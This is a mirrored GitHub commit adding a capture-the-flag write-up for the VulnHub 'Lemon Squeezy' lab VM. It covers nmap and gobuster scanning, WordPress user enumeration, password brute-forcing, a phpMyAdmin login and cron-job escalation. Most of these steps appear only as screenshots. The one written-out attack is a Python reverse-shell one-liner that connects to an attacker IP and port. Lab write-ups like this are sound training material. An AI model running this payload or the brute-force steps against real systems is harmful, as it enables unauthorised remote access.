Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-21 11:33:03 +00:00
Code Issues Projects Releases Packages Wiki Activity

Add files via upload

Browse source
This commit is contained in:
AbdullahRizwan101 2021-01-25 06:47:50 +05:00 committed by GitHub
parent 124054af91
commit b76a583598
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 87 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

87
VulnHub/LemonSqueezy.md Normal file
View file

@ -0,0 +1,87 @@
# VulnHub-Lemon Squeezy
## NMAP
```
nmap -sC -sV 172.16.6.128
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-25 05:47 PKT
Nmap scan report for 172.16.6.128
Host is up (0.00026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:BF:8A:DB (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
```
## PORT 80
<img src="https://imgur.com/3e3R2a3.png"/>
Running gobuster
<img src="https://imgur.com/ohut5DK.png"/>
We see that there's a wordpress directory and if you visit it css would not be rendered properly because it is using the domain name `lemonsqueezy` so put it in the `/etc/hosts` file
<img src="https://imgur.com/DNCzW3g.png"/>
<img src="https://imgur.com/TlT6WQg.png"/>
Since this is a wordpress site we can use wpscan to look for users
<img src="https://imgur.com/G26pGbt.png"/>
<img src="https://imgur.com/QOZdxRN.png"/>
Bruteforcing against these users
<img src="https://imgur.com/74gtYPG.png"/>
<img src="https://imgur.com/joxGmka.png"/>
<img src="https://imgur.com/rgNaNQf.png"/>
<img src="https://imgur.com/ZGbCvaa.png"/>
<img src="https://imgur.com/S0UFhtb.png"/>
<img src="https://imgur.com/Gt60xxp.png"/>
We know that there's another usernamed `lemon` maybe this is his passowrd for wordpress or phpmyadmin so let's try logging in with this
<img src="https://imgur.com/74oyBnN.png"/>
This was the password for orange to phpmyadmin
Insert a simple GET paramter php code to execute system commands through SQL
<img src="https://imgur.com/lFP3V6t.png"/>
<img src="https://imgur.com/14vCJfQ.png"/>
```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.129",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
Through this payload we get a reverse shell and I stabilized it with by spawning a shell with python also I looked at cronjobs running and there is a script running as root
<img src="https://imgur.com/qzGtQZd.png"/>
<img src="https://imgur.com/Qllpyik.png"/>
<img src="https://imgur.com/SuBS4mO.png"/>
This didnt work so I used the python reverse shell payload again
<img src="https://imgur.com/koX6v9M.png"/>
<img src="https://imgur.com/sQVe4Z7.png"/>